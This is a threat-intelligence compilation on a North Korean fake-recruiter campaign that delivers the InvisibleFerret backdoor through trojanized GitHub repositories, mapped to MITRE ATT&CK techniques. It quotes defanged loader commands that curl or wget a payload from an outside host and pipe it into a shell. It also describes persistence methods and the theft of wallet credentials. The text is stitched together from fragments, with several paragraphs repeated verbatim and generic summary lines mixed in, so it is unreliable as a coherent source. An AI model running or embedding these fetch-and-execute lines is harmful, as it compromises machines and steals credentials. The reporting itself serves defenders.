InvisibleFerret

ClickFix, which tricks users into following bogus prompts such as fake CAPTCHAs, and then infects victims' computers with trojanized codebases during the fake interview process.

North Korea is doubling down on a familiar playbook by weaponizing trust in open-source software and developer workflows... this campaign weaponizes developer trust in open-source repositories and legitimate tools like Visual Studio Code.

MITRE ATT&CK# T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain

Attackers pose as cryptocurrency recruiters on LinkedIn, sending targets to seemingly legitimate GitHub repositories that contain hidden malware.

This iteration uses malicious .vscode/tasks.json configurations to trigger JavaScript payloads disguised as web font files (.woff2) whenever a target opens a repository in VS Code.

The malicious .githooks/pre-commit script is short... it's a thin loader that fingerprints the OS via uname -s, then curls or wgets a per-platform payload from precommit.vercel.app and pipes it straight into a shell or cmd.exe. | curl -s 'hxxps://precommit[.]vercel.app/settings/mac?flag=5' | sh ... wget -qO- 'hxxps://precommit[.]vercel.app/settings/linux?flag=5' | sh ... curl -s hxxps://precommit[.]vercel.app/settings/windows?flag=5 | cmd

The intrusion set, also tracked as Famous Chollima, has migrated its primary implant from readable Python scripts into compiled binaries... the revised InvisibleFerret payload distributes as .pyd files on Windows and .so components on macOS... the malicious framework generates a lightweight runtime script to launch the core implant.

Behind the scenes, however, hidden task automation scripts execute obfuscated malicious JavaScript the moment the project is opened.

They then tricked victims into cloning compromised repositories locally. As a result, the engineering workstations ran the malicious components seamlessly.

Contagious Interview has also utilized a plist file located in /Library/LaunchAgents to enable a malicious bash script the ability to persist.

Examples include APT3 placing scripts in the startup folder, APT32 using Run keys to execute PowerShell and VBS scripts, TA2541 placing VBS files in the Startup folder, TeamTNT adding batch scripts to the startup folder, and Smoke Loader adding a script in the Startup folder to deploy the payload.

This iteration uses malicious .vscode/tasks.json configurations to trigger JavaScript payloads disguised as web font files (.woff2) whenever a target opens a repository in VS Code.

Bundlore can persist via a LaunchAgent. Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence. CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.

MITRE ATT&CK# T1546.016 — Event Triggered Execution: Installer Packages

Once launched, the malware uses a multi-stage loader to establish persistence across Windows, macOS, and Linux.

Multiple entries describe creating .lnk shortcuts in Startup folders, such as BACKSPACE creating a shortcut to itself in the CSIDL_STARTUP directory and DarkGate creating an LNK object in the victim startup folder. | The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.

The content repeatedly notes creation of '.lnk shortcut' files in the Startup folder, such as BACKSPACE creating a shortcut in CSIDL_STARTUP, DarkGate creating an LNK object in the victim startup folder, and Operation Dream Job placing LNK files into victims' startup folder.

Contagious Interview has also utilized a plist file located in /Library/LaunchAgents to enable a malicious bash script the ability to persist.

Examples include APT3 placing scripts in the startup folder, APT32 using Run keys to execute PowerShell and VBS scripts, TA2541 placing VBS files in the Startup folder, TeamTNT adding batch scripts to the startup folder, and Smoke Loader adding a script in the Startup folder to deploy the payload.

This iteration uses malicious .vscode/tasks.json configurations to trigger JavaScript payloads disguised as web font files (.woff2) whenever a target opens a repository in VS Code.

Bundlore can persist via a LaunchAgent. Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence. CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.

MITRE ATT&CK# T1546.016 — Event Triggered Execution: Installer Packages

Once launched, the malware uses a multi-stage loader to establish persistence across Windows, macOS, and Linux.

Multiple entries describe creating .lnk shortcuts in Startup folders, such as BACKSPACE creating a shortcut to itself in the CSIDL_STARTUP directory and DarkGate creating an LNK object in the victim startup folder. | The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.

The content repeatedly notes creation of '.lnk shortcut' files in the Startup folder, such as BACKSPACE creating a shortcut in CSIDL_STARTUP, DarkGate creating an LNK object in the victim startup folder, and Operation Dream Job placing LNK files into victims' startup folder.

The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.

This iteration uses malicious .vscode/tasks.json configurations to trigger JavaScript payloads disguised as web font files (.woff2).

The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'

The final payload, InvisibleFerret, is a Python-based backdoor that can steal credentials from more than a dozen crypto wallet extensions... as well as harvest browser credentials, log keystrokes, and hijack cryptocurrency addresses in the clipboard.

The final payload... can steal credentials from more than a dozen crypto wallet extensions, including MetaMask, Phantom, and Coinbase Wallet, as well as harvest browser credentials...

"InvisibleFerret has also queried the victim device using Python scripts to obtain the User and Hostname" and "Pikabot performs a variety of system checks and gathers system information, including commands such as whoami."

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."

BADNEWS crawls the victim's local drives and collects documents with selected extensions; Machete searches the file system for files of interest; Rover searches for files on local drives based on a predefined list of file extensions.

The content repeatedly describes threat actors and malware collecting, stealing, identifying, copying, or staging files, documents, credentials, logs, databases, and other information from compromised hosts or local systems.

The final payload, InvisibleFerret, is a Python-based backdoor that can steal credentials from more than a dozen crypto wallet extensions... as well as harvest browser credentials, log keystrokes, and hijack cryptocurrency addresses in the clipboard.

The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.

The final payload... can steal credentials... log keystrokes, and hijack cryptocurrency addresses in the clipboard.

Although IP addresses and port numbers can be extracted from the Cython binaries through binary analysis, the runtime Python execution scripts could override these values with different C&C destinations passed as command-line arguments.

The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.

BeaverTail is known to be used by North Korean attackers for information theft and downloading additional payloads... The use of Curl for downloading and the names of the downloaded files, “p.zi” and “p2.zip”, are known behaviors of BeaverTail... downloading additional malware like InvisibleFerret.

InvisibleFerret is a Python-based modular malware with information-stealing capabilities. It also provides remote control to attackers.

ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.